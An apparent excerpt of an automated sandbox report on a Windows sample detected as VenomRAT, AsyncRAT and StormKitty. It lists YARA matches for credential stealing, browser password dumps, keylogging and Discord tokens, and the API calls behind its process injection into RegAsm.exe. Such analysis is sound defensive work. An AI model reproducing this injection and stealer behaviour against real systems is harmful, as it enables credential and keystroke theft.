Jan 1, 2025 08:54:01.550365925 CET	1236	IN	Data Raw: 00 00 50 00 00 00 07 00 00 00 0a 00 00 00 00 00 00 00 08 00 00 00 60 00 00 00 00 00 00 00 08 00 00 00 20 00 00 00 00 00 00 00 09 00 00 00 a0 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 80 00 00 00 00 00 00 00 08 00 00 00 Data Ascii: P` @PXS;x8Qh(
Jan 1, 2025 08:54:01.550379038 CET	1236	IN	Data Raw: 00 00 00 00 00 00 09 00 00 00 ec 00 00 00 50 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00 08 00 00 00 5e 00 00 00 00 00 00 00 08 00 00 00 1e 00 00 00 00 00 00 00 09 00 00 00 9c 00 00 00 54 00 00 00 07 00 00 00 63 00 00 00 00 00 00 00 08 00 00 00 Data Ascii: P^Tc~>Rn.N`QU
Jan 1, 2025 08:54:01.550390005 CET	328	IN	Data Raw: 00 00 00 00 00 00 08 00 00 00 3b 00 00 00 00 00 00 00 09 00 00 00 d6 00 00 00 52 00 00 00 07 00 00 00 13 00 00 00 00 00 00 00 08 00 00 00 6b 00 00 00 00 00 00 00 08 00 00 00 2b 00 00 00 00 00 00 00 09 00 00 00 b6 00 00 00 00 00 00 00 08 00 00 00 Data Ascii: ;Rk+KPWS3w7Qg
Jan 1, 2025 08:54:01.555119991 CET	1236	IN	Data Raw: 00 00 08 00 00 00 5f 00 00 00 00 00 00 00 08 00 00 00 1f 00 00 00 00 00 00 00 09 00 00 00 9e 00 00 00 54 00 00 00 07 00 00 00 63 00 00 00 00 00 00 00 08 00 00 00 7f 00 00 00 00 00 00 00 08 00 00 00 3f 00 00 00 00 00 00 00 09 00 00 00 de 00 00 00 Data Ascii: _Tc?Ro/O`PTsR

Target ID:	0
Start time:	02:53:58
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\vfdjo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\vfdjo.exe"
Imagebase:	0x8c0000
File size:	36'352 bytes
MD5 hash:	A03F28F2C0BF87D438A28E815D4B458A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1721135012.00000000010F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:53:59
Start date:	01/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline"
Imagebase:	0xa50000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:53:59
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:53:59
Start date:	01/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD93C.tmp" "c:\Users\user\AppData\Local\Temp\lvbdqmie\CSC98E74741E11B4215AF424C82513491D.TMP"
Imagebase:	0x640000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:54:02
Start date:	01/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xa80000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000004.00000002.4148154004.000000000304D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	34.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	111
Total number of Limit Nodes:	0

Executed Functions

Function 010027FC Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01002A3E

Memory Dump Source

Source File: 00000000.00000002.1721081434.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_vfdjo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b4f1d481fe73a930d7ebf398688f5073d29069c105c6515e5334369ea829a8b9
Instruction ID: 021039f90fb505be036d79ad4caf8f14999d7ea9b81b1a1b4a23167d770597f2
Opcode Fuzzy Hash: b4f1d481fe73a930d7ebf398688f5073d29069c105c6515e5334369ea829a8b9
Instruction Fuzzy Hash: 76A16C71D00619DFEB22CFA8C8457DEBBF2BF44314F1481A9E889A7290DB749985CF91

Function 01002808 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01002A3E

Memory Dump Source

Source File: 00000000.00000002.1721081434.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_vfdjo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e95acc2e1189f77e5a46851cc7d6b7a06cde1399c4b18e1c815a5a3bc7caa024
Instruction ID: 4909b4a8855e35d65f0a1846ebf76c8bb627c0f46ec6312b27d8b40af55d162a
Opcode Fuzzy Hash: e95acc2e1189f77e5a46851cc7d6b7a06cde1399c4b18e1c815a5a3bc7caa024
Instruction Fuzzy Hash: EE916B71D00619DFEB21DFA8C8447DEBBF2BF44314F1481A9E889A7290DB749985CF91

Function 01002578 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01002610

Memory Dump Source

Source File: 00000000.00000002.1721081434.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_vfdjo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: eededdffaca7beb616251b70cba963432ab07514bcf16ff2f132f413fbe7590e
Instruction ID: 263bde9efaf58d8a50ac64cd5b42d15df79dcdcd2982c80f429168d27c8c6422
Opcode Fuzzy Hash: eededdffaca7beb616251b70cba963432ab07514bcf16ff2f132f413fbe7590e
Instruction Fuzzy Hash: B82157B19003199FDB10CFA9C885BDEBBF5FF48320F148429E959A7250C7789944DBA4

Function 01002580 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01002610

Memory Dump Source

Source File: 00000000.00000002.1721081434.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_vfdjo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ab92f0f8ee0e696a05d6d476c587d86f82e4a00553d946dc1d9bc88a7b7a9da2
Instruction ID: a005505cf32cafcb0207aff9f8834e28f4e446a55aa8190e0fffb94a07f488d5
Opcode Fuzzy Hash: ab92f0f8ee0e696a05d6d476c587d86f82e4a00553d946dc1d9bc88a7b7a9da2
Instruction Fuzzy Hash: 002136B1900359DFDB10CFA9C885BDEBBF5FF48320F10842AE959A7250C778A954CBA4

Function 010023E0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 01002466

Memory Dump Source

Source File: 00000000.00000002.1721081434.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_vfdjo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 634924f62b30e36861d8d40a8afda89710dceb3cb081fb52704b41e3ab8cef7d
Instruction ID: 29511f7964a3d26893ebd4237adaf06004fd2b4f28914aab8eb2b9a578a7b82c
Opcode Fuzzy Hash: 634924f62b30e36861d8d40a8afda89710dceb3cb081fb52704b41e3ab8cef7d
Instruction Fuzzy Hash: 112138B19003098FDB10DFAAC4857EEBFF4EF88324F14842AD559A7241CB78A945CFA5

Function 01002668 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 010026F0

Memory Dump Source

Source File: 00000000.00000002.1721081434.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_vfdjo.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4ce8fb43621cab0256c8511063c54c94495aeae0aa3689f240b20521818be224
Instruction ID: ef64bf491a1fdc978f852d4427c90b49505ae4be01b3842fcbfb864932a1e9f2
Opcode Fuzzy Hash: 4ce8fb43621cab0256c8511063c54c94495aeae0aa3689f240b20521818be224
Instruction Fuzzy Hash: FB2136B18003599FDB10CFAAC884ADEBBF5FF48320F108429E959A7250DB389944DBA4

Function 010023E8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 01002466

Memory Dump Source

Source File: 00000000.00000002.1721081434.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_vfdjo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 709f288598e15dda2f6220634ed93c2bf44414556cf60c02c8299c86c27f26ea
Instruction ID: 5fd727445eb6d218d72a8f250d8a51579df2f31600699e5ccc018c476fe917fe
Opcode Fuzzy Hash: 709f288598e15dda2f6220634ed93c2bf44414556cf60c02c8299c86c27f26ea
Instruction Fuzzy Hash: 252118B19003098FDB10DFAAC4857EEBFF4EF48324F14842AD559A7251CB789944CFA5

Function 01002670 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 010026F0

Memory Dump Source

Source File: 00000000.00000002.1721081434.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_vfdjo.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f59ae6dddff0592391d3199726b0b4242b88e8963a0a740f6450eee69f315732
Instruction ID: 4a5f8a74b4ef25c517ee47a7bf6dc1057468e65e84f469296fc96f8e0383901d
Opcode Fuzzy Hash: f59ae6dddff0592391d3199726b0b4242b88e8963a0a740f6450eee69f315732
Instruction Fuzzy Hash: 532128B18003599FDB10DFAAC884ADEFBF5FF48320F108429E959A7250C7349544CBA4

Function 010024B8 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0100252E

Memory Dump Source

Source File: 00000000.00000002.1721081434.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_vfdjo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b3e2120194042b8c93e892e83814bc839c665d11313ec504051a27ee0f17f10f
Instruction ID: cbbfb201eca959907deca97000357d1383964406ae87b9f9b59619725183daa6
Opcode Fuzzy Hash: b3e2120194042b8c93e892e83814bc839c665d11313ec504051a27ee0f17f10f
Instruction Fuzzy Hash: 3B1156728002499FDB10DFAAC845BDEBFF5EB88324F208429E559A7250C735A544CFA4

Function 010024C0 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0100252E

Memory Dump Source

Source File: 00000000.00000002.1721081434.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_vfdjo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 738ecc1548899b0be06dafaed9c89af694a727180864e695babd228576e683e6
Instruction ID: 41d48eedf454bf7a023e53e4705d70dad2998479364c49a877b90fa8d599792a
Opcode Fuzzy Hash: 738ecc1548899b0be06dafaed9c89af694a727180864e695babd228576e683e6
Instruction Fuzzy Hash: 7F1126729002499FDB10DFAAC844BDEBFF5EB88324F108419E559A7250C775A544CFA4

Function 01002330 Relevance: 1.6, APIs: 1, Instructions: 52
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 0100239A

Memory Dump Source

Source File: 00000000.00000002.1721081434.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_vfdjo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9420ab854574ce25bfceb081576c99446aa97abdee2c46894248f8a3c8dbd8be
Instruction ID: 3557989ca0e8cb4f964152ee83ae15b5deeee9a94774de783eca4074bd6c72ed
Opcode Fuzzy Hash: 9420ab854574ce25bfceb081576c99446aa97abdee2c46894248f8a3c8dbd8be
Instruction Fuzzy Hash: 56113AB19003488FDB14DFAAC4457DFFBF5EB88324F248829D559A7250CB75A544CF94

Function 01002338 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 0100239A

Memory Dump Source

Source File: 00000000.00000002.1721081434.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_vfdjo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 26f25b0f1c92a7b0e2250f7d9b38dac6a449460d37612e811db22dda28b07294
Instruction ID: 7154b3332594479b820d586fecccb43230242039d713988e852d08b822d420b1
Opcode Fuzzy Hash: 26f25b0f1c92a7b0e2250f7d9b38dac6a449460d37612e811db22dda28b07294
Instruction Fuzzy Hash: 39113AB19003488FDB14DFAAC4457DFFBF5EB88324F208429D559A7250C775A544CF94

Analysis Process: RegAsm.exePID: 7660, Parent PID: 7508COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25%
Total number of Nodes:	12
Total number of Limit Nodes:	1

Executed Functions

Function 01342F19 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 456
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 013433F9

Strings

4|cq, xrefs: 0134331D

Memory Dump Source

Source File: 00000004.00000002.4147738190.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1340000_RegAsm.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: 4|cq
API String ID: 2706961497-1781815312
Opcode ID: 0dfdee43906e3a420304032b2696274645e590c531d12473c43502f32af51e80
Instruction ID: 657d61f147656e1894612e897701ac00b90ba1b24b24bbe966a32f3c91f8f6d4
Opcode Fuzzy Hash: 0dfdee43906e3a420304032b2696274645e590c531d12473c43502f32af51e80
Instruction Fuzzy Hash: 6CE19771F0422947EB14DABDCC903AE76E3BFC8228F588239D956DB7C5EA74E9018741

Function 013427A0 Relevance: 3.1, Strings: 2, Instructions: 642
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4|cq, xrefs: 01342B95
PH^q, xrefs: 01342EDA

Memory Dump Source

Source File: 00000004.00000002.4147738190.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1340000_RegAsm.jbxd

Similarity

API ID:
String ID: 4|cq$PH^q
API String ID: 0-2532631261
Opcode ID: fcbc29a8faffe6237f832f0b10a6a49eca9423efae70293f71288a955fa364af
Instruction ID: 627498e61087bb081de81af769479f92ca7c6f0e849b180664f1f152174f483a
Opcode Fuzzy Hash: fcbc29a8faffe6237f832f0b10a6a49eca9423efae70293f71288a955fa364af
Instruction Fuzzy Hash: 9112B431B002094BDB14DE7D9C903AFB6E7AFC8218F588239E505EB795EE34ED428791

Function 01343370 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 013433F9

Memory Dump Source

Source File: 00000004.00000002.4147738190.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1340000_RegAsm.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 701f16e6b59568bee2bc39ad82ccc5acbcfe0549d15a388598318a21e01c7ecb
Instruction ID: 004baf6af224e75f3bc311a4fd786cad61d7854f042ee398de557fd395f7fd90
Opcode Fuzzy Hash: 701f16e6b59568bee2bc39ad82ccc5acbcfe0549d15a388598318a21e01c7ecb
Instruction Fuzzy Hash: 302112B1D003499FCB10CFAAD984ADEFBF4FF48324F20842AE519A7210C775A944CBA4

Function 06A048C8 Relevance: 4.1, Strings: 3, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p, xrefs: 06A04BDA
$^q, xrefs: 06A04909
(bq, xrefs: 06A04C18

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: (bq$p$$^q
API String ID: 0-1102528217
Opcode ID: 578e9309f1893d97db6f8611a03c447edb87f1f4714dc52862682bed54b2428b
Instruction ID: e1036b345d2160c21e72939e7f90b4ff0d4d5f96a631c59e4db621948bd329f9
Opcode Fuzzy Hash: 578e9309f1893d97db6f8611a03c447edb87f1f4714dc52862682bed54b2428b
Instruction Fuzzy Hash: 8FB17074B002049FD748EB6DD8506AEBAEAFFC8310F208529E909DB355DE35DC458BA1

Function 06A02880 Relevance: 3.0, Strings: 2, Instructions: 468
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 06A02BF8
(bq, xrefs: 06A02D40

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: 017d13af1a685b5f281a70a03c84fb1f03395fb1b3cbb5d15af8dadd212715a6
Instruction ID: d28cca620db0d5bb14275a33385a9192b8160d7a483ebd0730b0535c1884d924
Opcode Fuzzy Hash: 017d13af1a685b5f281a70a03c84fb1f03395fb1b3cbb5d15af8dadd212715a6
Instruction Fuzzy Hash: 19F1D3307043059FDB54EF69E898A6ABBB6FF89310F14856AE906CB391CB35D905CB90

Function 06A02178 Relevance: 2.7, Strings: 2, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 06A023FC
(bq, xrefs: 06A023D0

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: c49032e1a89e1855431d4be08b57f1042c179c3cc28f4ab283d143c38917f9d1
Instruction ID: 15e648f49776574218b5f42028cabf0f19f50ca2132e00c8b4049968b8c11458
Opcode Fuzzy Hash: c49032e1a89e1855431d4be08b57f1042c179c3cc28f4ab283d143c38917f9d1
Instruction Fuzzy Hash: 3381A135B002198FEB44EF69E4587AEB7B6FB88300F148529E905EB385CB35DD51CB91

Function 06A02ECA Relevance: 2.7, Strings: 2, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 06A03044
,bq, xrefs: 06A02EF0

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: ,bq$4'^q
API String ID: 0-1386295989
Opcode ID: ff9d0da665fba6b5307481a9b9894ad249dbfdbf2a0184de69255cb16b9392b7
Instruction ID: 69e3a10a12d8fb2b2db2922e2bf5b5509aa65577ddf37c29ee448133f6fc0903
Opcode Fuzzy Hash: ff9d0da665fba6b5307481a9b9894ad249dbfdbf2a0184de69255cb16b9392b7
Instruction Fuzzy Hash: 6151E471B042059FCB54EF79D9509AFBBFAAFC8350B10806AE506DB399DE30DD018BA1

Function 06A05FF0 Relevance: 2.6, Strings: 2, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06A06025
$^q, xrefs: 06A0602F

Memory Dump Source

Source File: 00000004.00000002.4160276489.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a00000_RegAsm.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 6488de27387ac4f2efcddce220aeda426c9de9f42f82ba2c7eb637ea175cc65d
Instruction ID: c9a1063e3e9b9b0a7026efd80381f96f7d9882a02ca1fe75d983fb70fbd190cf
Opcode Fuzzy Hash: 6488de27387ac4f2efcddce220aeda426c9de9f42f82ba2c7eb637ea175cc65d
Instruction Fuzzy Hash: 6D417F34B04401CFE7886F59E51842ABBB7FF84B197298845E1068F696CB32DD22CBD2

Function 01343DB8 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01343D73

Memory Dump Source

Source File: 00000004.00000002.4147738190.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1340000_RegAsm.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 6ee55ac9ac361cde5f78579514e03ca185176fb77eaf3476256cdb8d624738e5
Instruction ID: 41b122c078dd5af536bd4eef209b2742ccd7a25525ad197036e0f9db2fd73d98
Opcode Fuzzy Hash: 6ee55ac9ac361cde5f78579514e03ca185176fb77eaf3476256cdb8d624738e5
Instruction Fuzzy Hash: 2C21AE76A012268FDB24EFA9D4447EEBBF0BF58318F04401DC559A7350C735A841CF92

Function 013498D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01349967

Memory Dump Source

